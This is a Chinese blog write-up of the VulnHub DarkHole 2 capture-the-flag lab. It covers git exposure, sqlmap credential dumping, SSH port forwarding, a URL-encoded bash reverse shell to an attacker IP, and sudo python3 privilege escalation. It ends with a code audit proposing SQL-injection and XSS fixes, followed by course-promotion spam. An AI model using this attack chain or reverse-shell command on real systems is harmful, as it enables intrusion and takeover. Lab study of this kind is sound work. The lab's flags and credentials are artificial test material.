【渗透测试】DarkHole: 2靶场渗透测试
前言
1.1
下载安装
下载地址:https://www.vulnhub.com/entry/darkhole-2,740/
选择镜像文件进行下载。下载后解压是一个zip文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。
1.2
文件信息
文件名:darkhole_2.zip文件大小:3.3 GBMD5:391404A3E18AD0CE91397C6C065FBEC9SHA1:2849280B2AA098A140117B91031A69A9AD1F1977
1.3
注意事项
无。
1.4 靶场目标
获取root权限,共有两个flag。
lasy用户-user.txt:DarkHole{'This_is_the_life_man_better_than_a_cruise'}root用户-root.txt:DarkHole{'Legend'}
0****3
渗透测试
3.1
信息收集
确定IP地址、端口扫描、网站访问、目录扫描、网站下载、获得邮箱和密码。
3.1.1 确定IP地址
使用nmap确定该靶场IP地址,地址为:192.168.241.181。
namp -sP 192.168.241.0/24
3.1.2 端口扫描
使用nmap进行端口扫描,发现其开放22和80端口。
22端口开放SSH服务,OpenSSH 8.1p1;80端口开放HTTP服务,Apache httpd 2.4.41。
nmap -sV -v -T4 -A -p- 192.168.241.181
3.1.3 网站访问
访问80端口,经过翻译,是一个暗洞V2网站,有网站登录口。
3.1.4 目录扫描
经过扫描,发现有大量git目录地址可进行访问。
dirsearch -u http://192.168.241.181
3.1.5 网站下载
下载网站git地址网页信息。
wget -r http://192.169.241.181/.git/
使用git log命令查看历史提交记录,发现了login.php地址,是一个登录页面。
3.1.6 获得邮箱和密码
查看缓冲区信息,发现了邮箱和密码。
git diff a4d900a8d85e8938d3601f3cef113ee293028e10lush@admin.com/321
3.2
漏洞利用
网站登录、SQL注入、SSH远程连接、获得第一个flag、查看定时任务、端口转发、反弹shell、查看信息、切换到losy用户、使用sudo -l查看权限。
3.2.1 网站登录
使用获取的邮箱和密码登录该网站。显示用户信息,可以进行资料更改提交。
lush@admin.com/321
但是,URL中有注入点,尝试进行SQL注入。
3.2.2 SQL注入
使用SQLmap跑一下,注意修改cookie值。此步骤较慢,需要等待漫长时间。
sqlmap.py -u http://192.168.241.181/dashboard.php?id=1 --cookie=PHPSESSID="30sadinekfsr3sh27qpbknfldn" --dbs --batch
得到数据库为:darkhole_2、information_schema、mysql、performance_schema、sys。
继续爆破,得到数据库darkhole_2两个表,分别是ssh和users。
sqlmap.py -u http://192.168.241.181/dashboard.php?id=1 --cookie=PHPSESSID="30sadinekfsr3sh27qpbknfldn" -D darkhole_2 --tables
继续爆破,得到ssh表的列名为:user、id和pass。
sqlmap.py -u http://192.168.241.178/index.php -forms --batch -D doubletrouble -T users --columns sqlmap.py -u http://192.168.241.181/dashboard.php?id=1 --cookie=PHPSESSID="30sadinekfsr3sh27qpbknfldn" -D darkhole_2 -T ssh --columns
得到users表的列名为:address、contact_number、email、id、password和username。
sqlmap.py -u http://192.168.241.181/dashboard.php?id=1 --cookie=PHPSESSID="30sadinekfsr3sh27qpbknfldn" -D darkhole_2 -T users --columns
继续爆破,查看ssh表详细内容,得到SSH账密信息。
sqlmap.py -u http://192.168.241.181/dashboard.php?id=1 --cookie=PHPSESSID="30sadinekfsr3sh27qpbknfldn" -D darkhole_2 -T ssh -C id,user,pass --dump
[15:46:30] [INFO] fetching entries of column(s) '`user`,id,pass' for table 'ssh' in database 'darkhole_2'Database: darkhole_2Table: ssh[1 entry]+----+--------+------+| id | user | pass |+----+--------+------+| 1 | jehad | fool |+----+--------+------+
与此同时,users表的详细信息是邮箱和密码,该内容已在3.1.5步骤发现。此处不再阐述。
sqlmap.py -u http://192.168.241.181/dashboard.php?id=1 --cookie=PHPSESSID="30sadinekfsr3sh27qpbknfldn" -D darkhole_2 -T users -C id,email,password,username,address,contact_number --dump
3.2.3 SSH远程连接
使用获取到的账密,登录到靶机。
ssh jehad@192.168.241.181
3.2.4 获得第一个flag
在lasy用户目录下,获得第一个flag文件user.txt。
user.txt:DarkHole{'This_is_the_life_man_better_than_a_cruise'}
3.2.5 查看定时任务
查看靶机的定时任务,发现了9999端口。
cat /etc/crontab
查看/opt/web,发现index.php,查看源码,发现是get方式执行cmd命令。
3.2.6 端口转发
将9999端口转发到kali linux 9999端口。方便后续代码执行。
ssh -L 9999:127.0.0.1:9999 jehad@192.168.241.181
kali linux浏览器访问成功。
查看用户ID信息,发现是losy用户。
3.2.7 反弹shell
生成shell脚本,进行URL编码。
bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.241.138/9876%200%3E%261%27
kali linux开启端口监听,执行脚本信息。
反弹shell成功,进入losy用户。
3.2.8 查看信息
在losy用户目录下,查看文件夹详细内容。发现bash_history。
查看该文件,发现密码信息:gang。
3.2.9 切换到laosy用户
既然已经知道用户密码,我们切换到losy用户进行后续操作。
su losy密码为gang
3.2.10 使用sudo -l查看权限
使用sudo -l查看该用户是否具有sudo权限,发现Python3
3.3
权限提升
寻找执行方式、代码执行、获得第二个flag。
3.3.1 寻找执行方式
https://gtfobins.github.io/gtfobins/python/sudo python3 -c 'import os; os.system("/bin/sh")'#注意是python3
3.3.2 代码执行
执行命令,获取root权限。
通过python启动一个/bin/bash的伪终端。
python3 -c "import pty;pty.spawn('/bin/bash')"
3.3.3 获得第二个flag
root.txt:DarkHole{'Legend'}
0****4
代码审计
4.1
查看源码信息
cd /vat/www/html/ls -al
4.2
SQL注入风险
$id= $_GET['id'];$info= $connect->query("select * from users where id='$id'")->fetch_assoc();
该段代码直接将用户输入的ID参数没有做任何过滤或转义,直接拼接到SQL语句中,攻击者可以通过URL参数注入恶意语句获得用户信息。
可使用预处理语句进行修复。
$stmt = $connect->prepare("SELECT * FROM users WHERE id = ?");$stmt->bind_param("s", $id);$stmt->execute();$info = $stmt->get_result()->fetch_assoc();
4.3
XSS(跨站脚本)攻击风险
value="<?php echo $info['username']; ?>"
该段代码直接将数据库内容插入到HTML中的写法,没有任何输出过滤。
可使用htmlspecialchars()函数来防止HTML注入(XSS)。
value="<?php echo htmlspecialchars($info['username'], ENT_QUOTES, 'UTF-8'); ?>"
对其他内容也需加上该函数。
$info['username']$info['email']$info['contact_number']$info['address']
(
END
)
免责声明
黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
一、2025最新网络安全学习路线
一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
因篇幅有限,仅展示部分资料,需要见下图即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————
本文转自 https://blog.youkuaiyun.com/web22050702/article/details/148895491?spm=1001.2014.3001.5502,如有侵权,请联系删除。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
